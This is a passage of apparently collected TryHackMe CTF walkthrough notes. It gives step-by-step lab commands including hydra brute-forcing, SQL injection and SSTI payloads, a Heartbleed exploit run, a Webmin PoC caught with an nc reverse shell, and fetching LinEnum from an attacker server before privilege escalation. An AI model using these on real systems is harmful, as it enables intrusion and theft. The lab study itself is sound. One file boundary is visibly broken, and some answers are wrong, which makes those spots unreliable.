in your browser navigate to: http://severnaya-station.com/gnocertdir\n\n\t no answer needed\n\n- Try using the credentials you found earlier. Which user can you login as?\n\n\t- `x****`\n\n- Have a poke around the site. What other user can you find?\n\n\t- `do**`\n\n- What was this users password?\n\n\t- `hydra -l do** -P /data/src/wordlists/fasttrack.txt pop3://:55007`\n\t- `****`\n\n- Use this users credentials to go through all the services you have found to reveal more emails.\n\n\t no answer needed\n\n- What is the next user you can find from doak?\n\n\t- `dr_doak`\n\n- What is this users password?\n\n\t- `4*******!`\n\n- Take a look at their files on the moodle (severnaya-station.com)\n\n\t no answer needed\n\n- Download the attachments and see if there are any hidden messages inside them?\n\n\t no answer needed\n\n- Using the information you found in the last task, login with the newly found user.\n\n\t no answer needed\n\n- Take a look into Aspell, the spell checker plugin.\n\n\t no answer needed\n\n- Enumerate the machine manually.\n\n\t no answer needed\n\n- Whats the kernel version?\n\n\t- `3.**.0-**-generic`\n\n- You can download the exploit from here: [https://www.exploit-db.com/exploits/37292](https://www.exploit-db.com/exploits/37292)\n\n\t no answer needed\n\n- What is the root flag?\n\n\t- `5686**************************`\n" }, { "path": "Gotta-Catch'em-All/README.md", "content": "# Gotta Catch'em All!\n\n- Find the Grass-Type Pokemon\n\n\t- `nmap -sV `\n\t- `:` in the source code of the default page...\n\t- `ssh pokemon@` and enter the password\n\t- `cd Desktop`\n\t- `nc -lnvp 1234 < P0kEmOn.zip`\n\t- `nc 1234 > pokemon.zip`\n\t- `unzip pokemon.zip`\n\t- `cd P0kEmOn`\n\t- `cat grass-type.txt`\n\t- `50 6f 4b ** 4d 6f ** ** ** 75 ** 62 ** 73 61 75 ** 7d`\n\t- CyberChef with recipe \"From Hex\".\n\t- `*******{*********}`\n\n- Find the Water-Type Pokemon\n\n\t- `find / -type f | grep water-type`\n\t- `cat /var/www/html/water-type.txt`\n\t- `**************{********}`\n\t- But this flag has no sense...\n\t- Caesar Cypher? Yes...\n\t- `**************{********}`\n\n- Find the Fire-Type Pokemon\n\n\t- `find / -type f | grep fire-type`\n\t- `cat /etc/why_am_i_here?/fire-type.txt`\n\t- `cat /etc/why_am_i_here?/fire-type.txt | base64 -d`\n\t- `*******{**********}`\n\n- Who is Root's Favorite Pokemon?\n\n\t- `find / -type f | grep root`\n\t- After a lot of lines... `/home/roots-pokemon.txt`\n\t- `cat /home/roots-pokemon.txt`. Permission denied. f+ck.\n\t- After some minutes..\n\t- `pokemon@root:~/Videos/Gotta/Catch/Them/ALL!$ cat Could_this_be_what_Im_looking_for\\?.cplusplus`\n\t- `sudo su ash` and enter the password.\n\t- `sudo -l`\n\t- `cat /home/roots-pokemon.txt`\n\t- `********`\n\n- Congratulations! Thank You So Much For Completing The Pokemon Room!\n\n\t no answer needed\n\n\n\n" }, { "path": "Hacking-with-Powershell/README.md", "content": "# Hacking with Powershell\n\n- Read the above and deploy the machine!\n\n\t no answer needed\n\n- What is the command to get help about a particular cmdlet(without any parameters)?\n\n\t- `Get-Help`\n\n- What is the location of the file \"interesting-file.txt\"\n\n\t- `Get-ChildItem -Path C:\\ -Include *interesting-file.txt* -File -Recurse -ErrorAction SilentlyContinue`\n\t- `*:********* *****`\n\n- Specify the contents of this file\n\n\t- `Get-Content \"*******************\\interesting-file.txt.txt\"`\n\t- `************************`\n\n- How many cmdlets are installed on the system(only cmdlets, not functions and aliases)?\n\n\t- `Get-Command | Where-Object -Parameter CommandType -eq Cmdlet | measure`\n\t- `****`\n\n- Get the MD5 hash of interesting-file.txt\n\n\t- `Get-FileHash -Path \"***************\\interesting-file.txt.txt\" -Algorithm MD5`\n\t- `*********************************`\n\n- What is the command to get the current working directory?\n\n\t- `Get-Location`\n\n- Does the path \"C:\\Users\\Administrator\\Documents\\Passwords\" Exist(Y/N)?\n\n\t- `n`\n\n- What command would you use to make a request to a web server?\n\n\t- `Invoke-WebRequest`\n\n- Base64 decode the file b64.txt on Windows.\n\n\t- `certutil -decode \"C:\\Users\\Administrator\\Desktop\\b64.txt\" out.txt`\n\t- `Get-Content out.txt`\n\t- `****************************`\n\n- How many users are there on the machine?\n\n\t- `Get-LocalUser`\n\t- `*`\n\n- Which local user does this SID(S-1-5-21-1394777289-3961777894-1791813945-501) belong to?\n\n\t- `Get-LocalUser -SID \"S-1-5-21-1394777289-3961777894-1791813945-501\"`\n\t- `*****`\n\n- How many users have their password required values set to False?\n\n\t- `Get-LocalUser | Where-Object -Property PasswordRequired -Match false`\n\t- `*`\n\n- How many local groups exist?\n\n\t- `Get-LocalGroup | measure`\n\t- `**`\n\n- What command did you use to get the IP address info?\n\n\t- `Get-NetIPAddress`\n\n- How many ports are listed as listening?\n\n\t- `Get-NetTCPConnection | Where-Object -Property State -Match Listen | measure`\n\t- `**`\n\n- What is the remote address of the local port listening on port 445?\n\n\t- `::`\n\n- How many patches have been applied?\n\n\t- `Get-Hotfix | measure`\n\t- `**`\n\n- When was the patch with ID KB4023834 installed?\n\n\t- `Get-Hotfix -Id KB4023834`\n\t- `***********************`\n\n- Find the contents of a backup file.\n\n\t- `Get-ChildItem -Path C:\\ -Include *.bak* -File -Recurse -ErrorAction SilentlyContinue`\n\t- `Get-Content ***********`\n\t- `***************`\n\n- Search for all files containing `API_KEY`\n\n\t- `Get-ChildItem C:\\* -Recurse | Select-String -pattern API_KEY`\n\t- `**********`\n\n- What command do you do to list all the running processes?\n\n\t- `Get-Process`\n\n- What is the path of the scheduled task called new-sched-task?\n\n\t- `/`\n\n- Who is the owner of the C:\\\n\n\t- `Get-Acl c:/`\n\t- `** ************************`\n\n- What file contains the password?\n\n\t- `Doc3M`\n\n- What is the password?\n\n\t- `***********************`\n\n- What files contains an HTTPS link?\n\n\t- `Doc2Mary`\n\n- How many open ports did you find between 130 and 140(inclusive of those two)?\n\n\t- `11`\n" }, { "path": "Hardening-Basics-Part-1/README.md", "content": "# Hardening Basics Part 1\n\n- Deploy the VM and let's get started!\n\n\t no answer needed\n\n- No questions\n\n\t no answer needed\n\n- No questions\n\n\t no answer needed\n\n- No questions\n\n\t no answer needed\n\n- No questions\n\n\t no answer needed\n\n- No questions\n\n\t no answer needed\n\n- No questions\n\n\t no answer needed\n\n- No questions\n\n\t no answer needed\n\n- No questions\n\n\t no answer needed\n\n- No questions\n\n\t no answer needed\n\n- What group are users automatically added to in Ubuntu?\n\n\t- `sudo`\n\n- What would be the command to add an existing user, nick, to the sudo group? You're running as root\n\n\t- `usermod -aG nick sudo`\n\n- What command as a user can we enter to see what we are allowed to execute with sudo?\n\n\t- `sudo -l`\n\n- Where is the sudo policy file stored?\n\n\t- `/etc/sudoers`\n\n- When in visudo and you see `%____`, what does the % sign indicate that you are dealing with?\n\n\t- `group`\n\n- This Alias lets the user assign a name, like \"ADMINS\" to a group of people \n\n\t- `user`\n\n- Which Alias allows you to create a set of commands that you can then assign to a User Alias?\n\n\t- `Command`\n\n- Yey/Ney - emacs has a shell escape\n\n\t- `yey`\n\n- What is the minimum recommended password length set by NIST?\n\n\t- `8`\n\n- When using the pwhistory module, which file will contain the previous passwords for the user?\n\n\t- `opasswd`\n\n- What principle states that every user only has enough access to do their daily duties and tasks\n\n\t- `Principle of least privilege`\n\n- No questions\n\n\t no answer needed\n\n- No questions\n\n\t no answer needed\n\n- No questions\n\n\t no answer needed\n\n- This type of Firewall typically has two NIC cards\n\n\t- `network-based`\n\n- This type of Firewall is typically installed on a host computer and rules apply to that specific host only\n\n\t- `host-based`\n\n- Web Application Firewalls help add an extra layer of security to your web servers. Where should these be installed?\n\n\t- `Demilitarized zone`\n\n- iptables is not the name of the Linux Firewall. What is the framework that iptables allows us to interact with?\n\n\t- `netfilter`\n\n- This 3 letter acronym is a set of rules that defines what the Firewall should allow and what it should deny\n\n\t- `ACL`\n\n- Which iptables option allows us to keep track of the connection state?\n\n\t- `--ctstate`\n\n- Which iptable Chain is responsible for packets on the local network that are being carried onwards?\n\n\t- `FORWARD`\n\n- Which table mashes up the packets as they go through the Firewall?\n\n\t- `mangle`\n\n- What is the last rule that should be added to an access control list?\n\n\t- `Implicit Deny`\n" }, { "path": "Hardening-Basics-Part-2/README.md", "content": "# Hardening Basics Part 2\n\n- Deploy the VM if necessary and let's go!\n\n\t no answer needed\n\n- Which SSH Protocol version is the most secure?\n\n\t- `2`\n\n- This is a random, arbitrary number, used as the session key, that is used to encrypt GPG.\n\n\t- `nonce`\n\n- Yey/Ney - GPG is based off of the OpenGPG standard\n\n\t- `yey`\n\n- What is the command to generate your GPG keys?\n\n\t- `gpg --gen-key`\n\n- What is the command to symmetrically encrypt a file with GPG?\n\n\t- `gpg -c`\n\n- What is the command to asymmetrically encrypt a file with GPG?\n\n\t- `gpg -e`\n\n- What is the command to create SSH keys?\n\n\t- `ssh-keygen`\n\n- Where are ssh keys stored in a user's home directory?\n\n\t- `.ssh`\n\n- What option needs to be set to select the type of key to generate for SSH?\n\n\t- `-t`\n\n- The SSH configuration options presented in this chapter were found in what file (full path)?\n\n\t- `/etc/ssh/sshd_config`\n\n- No questions\n\n\t no answer needed\n\n- No questions\n\n\t no answer needed\n\n- No questions\n\n\t no answer needed\n\n- No questions\n\n\t no answer needed\n\n- No questions\n\n\t no answer needed\n\n- No questions\n\n\t no answer needed\n\n- No questions\n\n\t no answer needed\n\n- No questions\n\n\t no answer needed\n\n- No questions\n\n\t no answer needed\n\n- No questions\n\n\t no answer needed\n\n- Where are the AppArmor profiles located?\n\n\t- `/etc/apparmor.d`\n\n- This directory includes partial profiles to be used in your own custom profiles\n\n\t- `abstractions`\n\n- This punctuation mark is REQUIRED at the end of every rule in a profile\n\n\t- `,`\n\n- This AppArmor mode enforces the profiles but also logs them\n\n\t- `audit`\n\n- This command checks the status of AppArmor\n\n\t- `aa-status`\n\n- No questions\n\n\t no answer needed\n\n- Have fun!\n\n\t no answer needed\n" }, { "path": "Hashing-Crypto_101/README.md", "content": "# Hashing - Crypto 101\n\n- Is base64 encryption or encoding?\n\n\t- `encoding`\n\n- What is the output size in bytes of the MD5 hash function?\n\n\t- `16`\n\n- Can you avoid hash collisions? (Yea/Nay)\n\n\t- `Nay`\n\n- If you have an 8 bit hash output, how many possible hashes are there?\n\n\t- `256`\n\n- Crack the hash \"d0199f51d2728db6011945145a1b607a\" using the rainbow table manually.\n\n\t- `basketball`\n\n- Crack the hash \"5b31f93c09ad1d065c0491b764d04933\" using online tools\n\n\t- Just google it\n\n- Should you encrypt passwords? Yea/Nay\n\n\t- `Nay`\n\n- How many rounds does sha512crypt ($6$) use by default?\n\n\t- `5000`\n\n- What's the hashcat example hash (from the website) for Citrix Netscaler hashes?\n\n\t- [here](https://hashcat.net/wiki/doku.php?id=example_hashes)\n\n- How long is a Windows NTLM hash, in characters?\n\n\t- `32`\n\n- Crack this hash: $2a$06$7yoU3Ng8dHTXphAg913cyO6Bjs3K5lBnwq5FJyA6d01pMSrddr1ZG\n\n\t- Copy this hash inside a file called `hash`\n\t- `hashcat -m 3200 hash /usr/share/wordlists/rockyou.txt`\n\t- `***********`\n\n- Crack this hash: 9eb7ee7f551d2f0ac684981bd1f1e2fa4a37590199636753efe614d4db30e8e1\n\n\t- `hash-identifier` and paste the hash\n\t- `echo \"9eb7ee7f551d2f0ac684981bd1f1e2fa4a37590199636753efe614d4db30e8e1\" > hash`\n\t- `john --format=raw-sha256 hash -w /usr/share/wordlists/rockyou.txt`\n\t- `************`\n\n- Crack this hash: $6$GQXVvW4EuM$ehD6jWiMsfNorxy5SINsgdlxmAEl3.yif0/c3NqzGLa0P.S7KRDYjycw5bnYkF5ZtB8wQy8KnskuWQS3Yr1wQ0\n\n\t- Just google it\n\t- `********`\n\n- Bored of this yet? Crack this hash: b6b0d451bbf6fed658659a9e7e5598fe\n\n\t- Just google it\n\t- `*********`\n\n- What's the SHA1 sum for the amd64 Kali 2019.4 ISO? http://old.kali.org/kali-images/kali-2019.4/\n\n\t- http://old.kali.org/kali-images/kali-2019.4/SHA1SUMS\n\t- `**************************`\n\n- What's the hashcat mode number for HMAC-SHA512 (key = $pass)?\n\n\t- `hashcat --help | grep HMAC-SHA512`\n\t- `****`\n\n\n" }, { "path": "HeartBleed/README.md", "content": "# HeartBleed\n\n- Read above and ensure you have a good understanding of how the Heartbleed vulnerability works.\n\n\t no answer needed\n\n- What is the flag?\n\n\t- `searchsploit heartbleed`\n\t- `searchsploit -m 32745`\n\t- `python 32745.py > result.txt`\n\t- `cat result.txt`\n\t- `THM{**************}`\n\n\n" }, { "path": "Intro-PoC-Scripting/README.md", "content": "# Intro PoC Scripting\n\n- Please read the introduction description\n\n\t no answer needed\n\n- What is the target's platform and version number?\n\n\t- `webmin 1.580`\n\n- What is the associated CVE for this platform?\n\n\t- `CVE-2012-2982`\n\n- Which file does the vulnerability exist in?\n\n\t- `file/show.cgi`\n\n- What program/command would be the most effective to use in this exploit?\n\n\t- `system shell`\n\n- What's the original disclosure date of this exploit?\n\n\t- `September 6 2012`, It's written in the POC.\n\t\n\n- What HTTP response code do we expect after the initial POST request?\n\n\t- `302`\n\n- What does sid stand for and what is it's purpose?\n\n\t- `Session ID, authentication`\n\n- In the check function, what is it doing to the cookies?\n\n\t- `format`\n\n- In the second request of the check function, what method is piped into the command?\n\n\t- `rand_text_alphanumeric`\n\n- Which HTTP response header allows us to send an authenticated POST request?\n\n\t- `Set-Cookie`\n\n- Which is the correct method for formatting cookies in this example?\n\n\t- `any`\n\n- What data type does the payload need to be?\n\n\t- `string`\n\n- Why do we need to use \"bash -c exec\" instead of just \"bash -i\"\n\n\t- `replaces current shell process`\n\n- What is the purpose of \"<&1\" in the payload function?\n\n\t- `redirects socket output stream to bash input stream`\n\n- Run the program and listen for the shell. What is the /root/root.txt flag?\n\n\t- `wget https://raw.githubusercontent.com/cd6629/CVE-2012-2982-Python-PoC/master/web.py`\n\t- Change the IP address inside the file with yours.\n\t- Listen for a shell with `sudo nc -lnvp 53`\n\t- `python3 web.py `\n\t- On the new shell `cat /root/root.txt`\n\t- `THM{****************}`\n\n- No questions here\n\n\t no answer needed\n\n- Check out some of those links for more reading material.\n\n\t no answer needed\n\n\n\n" }, { "path": "Intro-to-Python/README.md", "content": "# Intro to Python\n\n- Section Complete\n\n\t no answer needed\n\n- Section Complete\n\n\t no answer needed\n\n- What is the name of > \n\n\t- `greater than`\n\n- What is the name of !=\n\n\t- `not equal to`\n\n- 1 != 0 will this return true or false (T or F)\n\n\t- `T`\n\n- What is the name of <=\n\n\t- `less or equal than`\n\n- Will this sample code return truee or false\n\n\t- `truee`\n\n- Section Complete\n\n\t no answer needed\n\n- Section Complete\n\n\t no answer needed\n\n- What data type is 13\n\n\t- `integer`\n\n- What data type is \"65\"\n\n\t- `string`\n\n- What data type is 62.193\n\n\t- `float`\n\n- Section Complete\n\n\t no answer needed\n\n- Section Complete\n\n\t no answer needed\n\n- Section Complete\n\n\t no answer needed\n\n- Section Complete\n\n\t no answer needed\n\n- Section Complete\n\n\t no answer needed\n\n- Section Complete\n\n\t no answer needed\n\n- Section Complete!\n\n\t no answer needed\n\n- Enter the decoded flag to complete the room!\n\n\t- `python decode.py`\n\t- `*********************************`\n\n\n" }, { "path": "Intro-to-Python/decode.py", "content": "import base64\n\nwith open(\"encodedflag.txt\", \"r\") as f:\n\t\tencoded_flag = f.read()\n\nfor i in range(5):\n\tencoded_flag = base64.b16decode(encoded_flag)\n\nfor i in range(5):\n\tencoded_flag = base64.b32decode(encoded_flag)\n\nfor i in range(5):\n\tencoded_flag = base64.b64decode(encoded_flag)\n\nprint(encoded_flag)" }, { "path": "Intro-to-Windows/README.md", "content": "# Intro to Windows\n\n- Read a little about Windows history and versions.\n\n\t no answer needed\n\n- When was Windows announced?\n\n\t- `November 20 1985`\n\n- Which is the latest version of Windows?\n\n\t- `Windows 10`\n\n- Which is the latest version of Windows Server?\n\n\t- `Windows Server 2019`\n\n- Read the above.\n\n\t no answer needed\n\n- In which folder are users profiles stored?\n\n\t- `Users`\n\n- Read the above.\n\n\t no answer needed\n\n- Which Active Directory is cloud based?\n\n\t- `Azure Active Directory`\n\n- Which authentication method does not provide data integrity?\n\n\t- `NTLM`\n\n- Authentication method that assings a ticket in order for a user to login?\n\n\t- `Kerberos`\n\n- Which authentication method allow users to access applications with a single login (short name)?\n\n\t- `SAML`\n\n- Authentication method that uses JSON Web Tokens?\n\n\t- `OpenID Connect`\n\n- Read the above.\n\n\t no answer needed\n\n- Read the above.\n\n\t no answer needed\n\n- Which can be considered the most important server?\n\n\t- `Domain Controller`\n\n- Which server can store emails?\n\n\t- `Mail Server`\n\n- Create the users and groups.\n\n\t no answer needed\n\n- Create your first GPO.\n\n\t no answer needed\n\n\n" }, { "path": "Introduction-to-Django/README.md", "content": "# Introduction to Django\n\n- Read the above.\n\n\t no answer needed\n\n- How would we create an app called Forms?\n\n\t- `python3 manage.py startapp Forms`\n\n- How would we run our project to a local network?\n\n\t- `python3 manage.py runserver 0.0.0.0:80`\n\n- Read the above\n\n\t no answer needed\n\n- Flag from GitHub page\n\n\t- `THM{**************}`\n\n- Admin panel flag?\n\n\t- Retrieve the `db.sqlite3` file.\n\t- `sqlite3 db.sqlite3`\n\t- `.databases`\n\t- `select * from db.auth_user`\n\t- `THM{************}`\n\n- User flag?\n\n\t- `select * from db.auth_user`\n\t- Go to the PasteBin link\n\t- `hash-identifier`\n\t- Go to [crackstation](https://crackstation.net) and crack the hash\n\t- `su StrangeFox` and crack the hash\n\t- `cat ~/user.txt`\n\t- `THM{************}`\n\n- Hidden flag?\n\n\t- `cd ~/messagebox/messagebox`\n\t- `cat * | grep THM`\n\t- `THM{************}`\n\n\n\n\n" }, { "path": "Introduction-to-Flask/README.md", "content": "# Introduction to Flask\n\n- Let's go!\n\n\t no answer needed\n\n- Which environment variable do you need to change in order to run Flask?\n\n\t- `FLASK_APP`\n\n- What's the default deployment port used by Flask?\n\n\t- `5000`\n\n- Is it possible to change that port? (yay/nay)\n\n\t- `yay`\n\n- Does Flask support POST requests? (yay/nay)\n\n\t- `yay`\n\n- What markdown language can you use to make templates for Flask? \n\n\t- `html`\n\n- Awesome!\n\n\t no answer needed\n\n- What's inside /home/flask/flag.txt ?\n\n\t- Visit `http://:5000/vuln`\n\t- Now add `?name={{person.password}}`\n\t- Now instead use `{{ get_user_file(\"/etc/passwd\") }}`\n\t- And now try with `http://:5000/vuln?name={{%20get_user_file(%22/home/flask/flag.txt%22)%20}}`\n\t- `THM{**************}`\n\n- See you in the next room!\n\n\t no answer needed\n\n\n\n" }, { "path": "Introduction-to-OWASP-ZAP/README.md", "content": "# Introduction to OWASP ZAP\n\n- What does ZAP stand for?\n\n\t- `Zed Attack proxy`\t\n\n- Connect to the TryHackMe network and deploy the machine. Once deployed, wait a few minutes and visit the web application: http://\n\n\t no answer needed\n\n- I've read the task.\n\n\t no answer needed\n\n- Install ZAP on an operating system of your choice!\n\n\t no answer needed\n\n- Open OWASP ZAP, ready to follow along with this room.\n\n\t no answer needed\n\n- Set up Ajax Spider\n\n\t no answer needed\n\n- What IP do we use for the proxy?\n\n\t- `127.0.0.1`\n\n- Try scanning the DVWA web application as an authenticated user.\n\n\t no answer needed\n\n- Try brute-forcing the DVWA web application.\n\n\t no answer needed\n\n- Use ZAP to bruteforce the DVWA 'brute-force' page. What's the password?\n\n\t- `password`\n\n- Set up HUNT on your Zap application to automatically perform passive scans on sites you visit!\n\n\t no answer needed\n\n- Check out the additional reading material.\n\n\t no answer needed\n" }, { "path": "Introductory-Networking/README.md", "content": "# Introductory Networking\n\n- Let's get started!\n\n\t no answer needed\n\n- Which layer would choose to send data over TCP or UDP?\n\n\t- `4`\n\n- Which layer checks received packets to make sure that they haven't been corrupted?\n\n\t- `2`\n\n- In which layer would data be formatted in preparation for transmission?\n\n\t- `2`\n\n- Which layer transmits and receives data?\n\n\t- `1`\n\n- Which layer encrypts, compresses, or otherwise transforms the initial data to give it a standardised format?\n\n\t- `6`\n\n- Which layer tracks communications between the host and receiving computers?\n\n\t- `5`\n\n- Which layer accepts communication requests from applications?\n\n\t- `7`\n\n- Which layer handles logical addressing?\n\n\t- `3`\n\n- When sending data over TCP, what would you call the \"bite-sized\" pieces of data? \n\n\t- `segments`\n\n- [Research] Which layer would the FTP protocol communicate with?\n\n\t- `7`\n\n- Which transport layer protocol would be best suited to transmit a live video?\n\n\t- `udp`\n\n- How would you refer to data at layer 2 of the encapsulation process (with the OSI model)?\n\n\t- `frames`\n\n- How would you refer to data at layer 4 of the encapsulation process (with the OSI model), if the UDP protocol has been selected?\n\n\t- `datagram`\n\n- What process would a computer perform on a received message?\n\n\t- `de-encapsulation`\n\n- Which is the only layer of the OSI model to add a trailer during encapsulation?\n\n\t- `data link`\n\n- Does encapsulation provide an extra layer of security (Aye/Nay)?\n\n\t- `Aye`\n\n- Which model was introduced first, OSI or TCP/IP?\n\n\t- `tcp/ip`\n\n- Which layer of the TCP/IP model covers the functionality of the Transport layer of the OSI model (Full Name)?\n\n\t- `transport`\n\n- Which layer of the TCP/IP model covers the functionality of the Session layer of the OSI model (Full Name)?\n\n\t- `application`\n\n- The Network Interface layer of the TCP/IP model covers the functionality of two layers in the OSI model. These layers are Data Link, and?.. (Full Name)?\n\n\t- `physical`\n\n- Which layer of the TCP/IP model handles the functionality of the OSI network layer?\n\n\t- `internet`\n\n- What kind of protocol is TCP?\n\n\t- `connection-based`\n\n- What is SYN short for?\n\n\t- `synchronise`\n\n- What is the second step of the three way handshake?\n\n\t- `syn/ack`\n\n- What is the short name for the \"Acknowledgement\" segment in the three-way handshake?\n\n\t- `ack`\n\n- What is the protocol specified in the section of the request that's linked to the Application layer of the OSI and TCP/IP Models?\n\n\t- `domain name system`\n\n- Which layer of the OSI model does the section that shows the IP address \"172.16.16.77\" link to (Name of the layer)?\n\n\t- `network`\n\n- In the section of the request that links to the Transport layer of the OSI and TCP/IP models, which protocol is specified?\n\n\t- `user datagram protocol`\n\n- Over what medium has this request been made (linked to the Data Link layer of the OSI model)?\n\n\t- `Ethernet II`\n\n- Which layer of the OSI model does the section that shows the number of bytes transferred (81) link to?\n\n\t- `physical`\n\n- [Research] Can you figure out what kind of address is shown in the layer linked to the Data Link layer of the OSI model?\n\n\t- `MAC`\n\n- What command would you use to ping the bbc.co.uk website?\n\n\t- `ping bbc.co.uk`\n\n- Ping muirlandoracle.co.uk\nWhat is the IP address?\n\n\t- `ping muirlandoracle.co.uk`\n\t- `217.160.0.152`\n\n- What switch lets you change the interval of sent ping requests?\n\n\t- `-i`\n\n- What switch would allow you to restrict requests to IPV4?\n\n\t- `-4`\n\n- What switch would give you a more verbose output?\n\n\t- `-v`\n\n- Use traceroute on tryhackme.com\nCan you see the path your request has taken?\n\n\tno answer needed\n\n- What switch would you use to specify an interface when using Traceroute?\n\n\t- `-i`\n\n- What switch would you use if you wanted to use TCP requests when tracing the route?\n\n\t- `-t`\n\n- [Lateral Thinking] Which layer of the TCP/IP model will traceroute run on by default (Windows)?\n\n\t- `internet`\n\n- Perform a whois search on facebook.com\n\n\t no answer needed\n\n- What is the registrant postal code for facebook.com?\n\n\t- `94025`\n\n- When was the facebook.com domain first registered?\n\n\t- `29/03/1997`\n\n- Perform a whois search on microsoft.com\n\n\t no answer needed\n\n- Which city is the registrant based in?\n\n\t- `Redmond`\n\n- [OSINT] What is the name of the golf course that is near the registrant address for microsoft.com?\n\n\t- `Bellevue Golf Course`\n\n- What is the registered Tech Email for microsoft.com?\n\n\t- `msnhst@microsoft.com`\n\n- What is DNS short for?\n\n\t- `domain name system`\n\n- What is the first type of DNS server your computer would query when you search for a domain?\n\n\t- `recursive`\n\n- What type of DNS server contains records specific to domain extensions (i.e. .com, .co.uk*, etc)*? Use the long version of the name?\n\n\t- `top-level domain`\n\n- Where is the very first place your computer would look to find the IP address of a domain?\n\n\t- `local cache`\n\n- [Research] Google runs two public DNS servers. One of them can be queried with the IP 8.8.8.8, what is the IP address of the other one?\n\n\t- `8.8.4.4`\n\n- If a DNS query has a TTL of 24 hours, what number would the dig query show?\n\n\t- `86400`\n\n- Read the final thoughts\n\n\t no answer needed\n\n\n" }, { "path": "JavaScript-Basics/README.md", "content": "# JavaScript Basics\n\n- Let's Begin\n\n\t no answer needed\n\n- What type of data type is this: 'Neo'?\n\n\t- `string`\n\n- What data type is true/false?\n\n\t- `boolean`\n\n- What is John's occupation?\n\n\t- `Master Hacker`\n\n- What tag is used for linking a JavaScript file to HTML?\n\n\t- `script`\n\n- Congratulations! You can now write conditionals!\n\n\t no answer needed\n\n- Finished with Functions!\n\n\t no answer needed\n\n- What type of brackets are used for arrays?\n\n\t- `[]`\n\n- What color pill did we choose?\n\n\t- `red pill`\n\n- What is the output of this code?\n\n\t- `Tyrell`\n\n- Loops repeat until the written code is finished running (true/false)\n\n\t- `true`\n\n- What loop doesn't require the condition to be true for it execute at least once?\n\n\t- `do...while`\n\n- What is the DOM?\n\n\t- `document object model`\n\n- What is it called when XSS is used to record keystrokes?\n\n\t- `keylogging`\n\n- JavaScript Basics Master!\n\n\t no answer needed\n\n- Sort the array [1,10,5,15,2,7,28,900,45,18,27]\n\n\t- [solution](https://github.com/edoardottt/tryhackme-ctf/blob/main/JavaScript-Basics/sort.js). Try with `node sort.js`.\n\t- `[1,2,5,7,10,18,27,28,45,900]`\n\n\n\n\n\n" }, { "path": "JavaScript-Basics/sort.js", "content": "\nfunction sort(array) {\n\tfor (var i=1; i password.txt`\n\t- `john --wordlist=/usr/share/wordlists/rockyou.txt --format=sha512crypt password.txt`\n\t- `****`\n\n- What is Joker's password?\n\n\t- Insert the username `Joker` before the hash and then insert `:` between the two.\n\t- `john --single --format=raw-MD5 hash7.txt`\n\t- `*****`\n\n- What do custom rules allow us to exploit?\n\n\t- `Password complexity predictability`\n\n- What rule would we use to add all capital letters to the end of the word?\n\n\t- `Az\"[A-Z]\"`\n\n- What flag would we use to call a custom rule called \"THMRules\"\n\n\t- `--rule=THMRules`\n\n- What is the password for the secure.zip file?\n\n\t- `zip2john secure.zip > zip.zip`\n\t- `john --wordlist=/usr/share/wordlists/rockyou.txt zip.zip`\n\t- `*******`\n\n- What is the contents of the flag inside the zip file?\n\n\t- `unzip secure.zip` and enter password.\n\t- `cat zippy/flag.txt`\n\t- `**********************`\n\n- What is the password for the secure.rar file?\n\n\t- `rar2john secure.rar > rar.rar`\n\t- `john --wordlist=/usr/share/wordlists/rockyou.txt rar.rar`\n\t- `********`\n\n- What is the contents of the flag inside the zip file?\n\n\t- `unrar x secure.rar` and enter the pwd.\n\t- `*************************`\n\n- What is the SSH private key password?\n\n\t- `python2 /usr/share/john/ssh2john.py idrsa.id_rsa > id.id`\n\t- `john --wordlist=/usr/share/wordlists/rockyou.txt id.id`\n\t- `*****`\n\n- Update me..\n\n\t no answer needed\n\n\n\n" }, { "path": "Jurassic-Park/README.md", "content": "# Jurassic Park\n\n- What is the SQL database called which is serving the shop information?\n\n\t- `scilla port -target `\n\t- Visit `http://`\n\t- Interesting content here: `http:///item.php?id=5`\n\t- `scilla dir -target `\n\t- `/assets` accessible, but nothing interesting.\n\t- `http:///item.php?id=%27%20OR%201=1%20--%20-`\n\t- WOOHOO.\n\t- `sqlmap -u \"http:///item.php?id=1\" --dump`\n\t- `****`\n\n- How many columns does the table have?\n\n\t- also with: `http:///item.php?id=5%20union%20select%201,2,3,4,5`\n\t- `5`\n\n- Whats the system version?\n\n\t- `ubuntu **.**`\n\n- What is dennis' password?\n\n\t- `********`\n\n- Locate and get the first flag contents.\n\n\t- `ssh dennis@`, `yes` and enter the password.\n\t- `cat flag1.txt`\n\t- `**************************`\n\n- Whats the contents of the second flag?\n\n\t- `cat .*`\n\t- `cat /boot/grub/fonts/flagTwo.txt`\n\t- `****************************`\n\n- Whats the contents of the third flag?\n\n\t- `cat /home/dennis/.bash_history`\n\t- `****************************`\n\n- There is no fourth flag.\n\n\t no answer needed\n\n- Whats the contents of the fifth flag?\n\n\t- `wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh`\n\t- `sudo python3 -m http.server`\n\t- `wget http://:8000/LinEnum.sh`\n\t- `chmod +x LinEnum.sh`\n\t- `./LinEnum.sh`\n\t- `sudo -l`\n\t- scp withou password.\n\t- https://gtfobins.github.io/gtfobins/scp/#sudo\n\t- `cat /root/root.txt`\n\t- `*************************`\n\n\n" }, { "path": "LFI/README.md", "content": "# LFI\n\n- Deploy the VM and access its web server: `http://`\n\n\t no answer needed\n\n- Look around the website. What is the name of the parameter you found on the website?\n\n\t- `page`\n\n- You can read the interesting files to check out while testing for LFI.\n\n\t no answer needed\n\n- This file can give information about the system like the name of all the existing users on the system.\n\n\t no answer needed\n\n- What is the name of the user on the system?\n\n\t- `falcon`\n\n- Once you find the name of the user it's important to see if you can include anything common and important in that user's directory, could be anything like theirs .bashrc etc\n\n\t no answer needed\n\n- Name of the file which can give you access to falcon's account on the system?\n\n\t- `id_rsa`\n\n- What is the user flag?\n\n\t- copy the file `id_rsa` inside your machine\n\t- `chmod 600 id_rsa`\n\t- `ssh falcon@ -i id_rsa`\n\t- `ls`\n\t- `cat user.txt`\n\t- `**********************`\n\n- What can falcon run as root?\n\n\t- `sudo -l`\n\t- `/bin/********`\n\n- Search gtfobins via the website or by using gtfo tool, to see if you find any way to use that binary for privilege escalation.\n\n\t no answer needed\n\n- What is the root flag?\n\n\t- `**********************`\n\n- Why not complete the LFI beginner level challenge next?\n\n\t no answer needed\n\n\n\n\n" }, { "path": "LFI-Basics/README.md", "content": "# LFI Basics\n\n- Start the VM and access it using your browser.\n\n\t no answer needed\n\n- Access the first walkthrough, and add a parameter at the end of the link named \"?page=\".\n\n\t no answer needed\n\n- Let's include the home page. At the \"?page=\" parameter enter home.html to include the home page.\n\n\t no answer needed\n\n- What's the message you get when you include the 